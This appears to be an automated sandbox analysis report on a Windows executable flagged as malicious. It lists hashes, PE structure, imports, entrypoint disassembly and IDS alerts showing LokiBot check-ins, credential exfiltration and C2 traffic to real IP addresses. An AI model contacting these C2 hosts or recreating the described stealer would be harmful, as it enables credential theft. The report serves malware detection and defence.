SSDEEP:	1536:6ooNFj7ZqmXI0pDApgjY2xqOJnYviJ/mH:6hV/PqH2sO2v2/Y
MD5:	CDD3D1BB178C391A905C40D2B292F4D6
SHA1:	BF7FCE373510E8FAC054703F879C5AAC2E8ED584
SHA-256:	F0881D1C9F9E086EB8D814E03CD6C01F357F0CAE2627FF27E011104C6E88CCEA
SHA-512:	E089BC47342B8FFE798E665F3D248DE711E704058717398B240809DB261E5226AD748F80F7E45AE1BB7EFA27196A9A520109CB633782394C90C13B0D79C0E41A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H.\|g................................. ........@.. ....................... ............`.....................................K.......................x............................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........h..4]..............................................................(......(....&.s....%(....(.....o....o....o........(.....s....%(.....o....u....r...po....o.......(.....0..=.......s...........(....(.....o....u....rM..p(..........o....o..........(.....0..........ra..p(.....r...p(.....(....u.....s.....s...........o.....s............io....s....%..o....o.......+.....9......o.......9......o......9.....o.........(....@.%e..........Ft........'.\.........(....*.0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.047932647192633
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	9876567899.bat.exe
File size:	1'176'576 bytes
MD5:	6d9798801523ee1c8c5dc83d28346814
SHA1:	66d6c6e65ffb8c635a286d68de624ef5d469cf9b
SHA256:	62e0fac7c5231aa0d8d5f0fdb9e64d8bdadf79934a26577282b7affbc557a5fb
SHA512:	9dfc24338cee8dbbe830f4011d9b91fcaecbb861e75b19b9d28614f1d3b7d290da4c1146251a09cb66b0b9872e7bf12c6899ca8090d1292cc0c11e2e0e700164
SSDEEP:	24576:RqDEvCTbMWu7rQYlBQcBiT6rprG8ahmu9LHa7yyx:RTvC/MTQYxsWR7ahmiHaOy
TLSH:	E945BF0273C1C062FF9B92334F5AF6515BBC69660123A62F13A81DB9BD701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x677CF893 [Tue Jan 7 09:49:07 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F8AD0E109C3h
jmp 00007F8AD0E102CFh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F8AD0E104ADh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F8AD0E1047Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F8AD0E1306Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F8AD0E130B8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F8AD0E130A1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x489f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11d000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x489f8	0x48a00	8f302182e874b4f64aa5215488785fa5	False	0.9101461650172117	data	7.851754321313259	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11d000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x3fcc0	data			1.000329108498653
RT_GROUP_ICON	0x11c478	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x11c4f0	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11c504	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11c518	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11c52c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11c608	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T11:01:56.715463+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49704	172.245.123.11	80	TCP
2025-01-07T11:01:56.715463+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49704	172.245.123.11	80	TCP
2025-01-07T11:01:56.715463+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49704	172.245.123.11	80	TCP
2025-01-07T11:01:57.233864+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49704	172.245.123.11	80	TCP
2025-01-07T11:01:57.382609+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49705	172.245.123.11	80	TCP
2025-01-07T11:01:57.382609+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49705	172.245.123.11	80	TCP
2025-01-07T11:01:57.382609+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49705	172.245.123.11	80	TCP
2025-01-07T11:01:57.878406+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49705	172.245.123.11	80	TCP
2025-01-07T11:01:57.943923+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49706	172.245.123.11	80	TCP
2025-01-07T11:01:57.943923+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49706	172.245.123.11	80	TCP
2025-01-07T11:01:57.943923+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49706	172.245.123.11	80	TCP
2025-01-07T11:01:58.458090+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49706	172.245.123.11	80	TCP
2025-01-07T11:01:58.458090+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49706	172.245.123.11	80	TCP
2025-01-07T11:01:58.646333+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49708	172.245.123.11	80	TCP
2025-01-07T11:01:58.646333+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49708	172.245.123.11	80	TCP
2025-01-07T11:01:58.646333+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49708	172.245.123.11	80	TCP
2025-01-07T11:01:59.167458+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49708	172.245.123.11	80	TCP
2025-01-07T11:01:59.167458+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49708	172.245.123.11	80	TCP
2025-01-07T11:01:59.172328+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49708	TCP
2025-01-07T11:01:59.326148+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49709	172.245.123.11	80	TCP
2025-01-07T11:01:59.326148+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49709	172.245.123.11	80	TCP
2025-01-07T11:01:59.326148+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49709	172.245.123.11	80	TCP
2025-01-07T11:01:59.826437+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49709	172.245.123.11	80	TCP
2025-01-07T11:01:59.826437+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49709	172.245.123.11	80	TCP
2025-01-07T11:01:59.826461+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49709	TCP
2025-01-07T11:01:59.975652+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49710	172.245.123.11	80	TCP
2025-01-07T11:01:59.975652+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49710	172.245.123.11	80	TCP
2025-01-07T11:01:59.975652+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49710	172.245.123.11	80	TCP
2025-01-07T11:02:00.489975+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49710	172.245.123.11	80	TCP
2025-01-07T11:02:00.489975+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49710	172.245.123.11	80	TCP
2025-01-07T11:02:00.495096+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49710	TCP
2025-01-07T11:02:00.675299+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49711	172.245.123.11	80	TCP
2025-01-07T11:02:00.675299+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49711	172.245.123.11	80	TCP
2025-01-07T11:02:00.675299+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49711	172.245.123.11	80	TCP
2025-01-07T11:02:00.833300+0100	2022053	ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2	1	194.15.112.248	443	192.168.2.5	49707	TCP
2025-01-07T11:02:01.182301+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49711	172.245.123.11	80	TCP
2025-01-07T11:02:01.182301+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49711	172.245.123.11	80	TCP
2025-01-07T11:02:01.192750+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49711	TCP
2025-01-07T11:02:01.372775+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49712	172.245.123.11	80	TCP
2025-01-07T11:02:01.372775+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49712	172.245.123.11	80	TCP
2025-01-07T11:02:01.372775+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49712	172.245.123.11	80	TCP
2025-01-07T11:02:01.907867+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49712	172.245.123.11	80	TCP
2025-01-07T11:02:01.907867+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49712	172.245.123.11	80	TCP
2025-01-07T11:02:01.907960+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49712	TCP
2025-01-07T11:02:02.102743+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49714	172.245.123.11	80	TCP
2025-01-07T11:02:02.102743+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49714	172.245.123.11	80	TCP
2025-01-07T11:02:02.102743+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49714	172.245.123.11	80	TCP
2025-01-07T11:02:02.634049+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49714	172.245.123.11	80	TCP
2025-01-07T11:02:02.634049+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49714	172.245.123.11	80	TCP
2025-01-07T11:02:02.638895+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49714	TCP
2025-01-07T11:02:02.801547+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49715	172.245.123.11	80	TCP
2025-01-07T11:02:02.801547+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49715	172.245.123.11	80	TCP
2025-01-07T11:02:02.801547+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49715	172.245.123.11	80	TCP
2025-01-07T11:02:03.321041+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49715	172.245.123.11	80	TCP
2025-01-07T11:02:03.321041+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49715	172.245.123.11	80	TCP
2025-01-07T11:02:03.325869+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49715	TCP
2025-01-07T11:02:03.617744+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49716	172.245.123.11	80	TCP
2025-01-07T11:02:03.617744+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49716	172.245.123.11	80	TCP
2025-01-07T11:02:03.617744+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49716	172.245.123.11	80	TCP
2025-01-07T11:02:04.082310+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49716	172.245.123.11	80	TCP
2025-01-07T11:02:04.082310+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49716	172.245.123.11	80	TCP
2025-01-07T11:02:04.088778+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49716	TCP
2025-01-07T11:02:04.247901+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49717	172.245.123.11	80	TCP
2025-01-07T11:02:04.247901+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49717	172.245.123.11	80	TCP
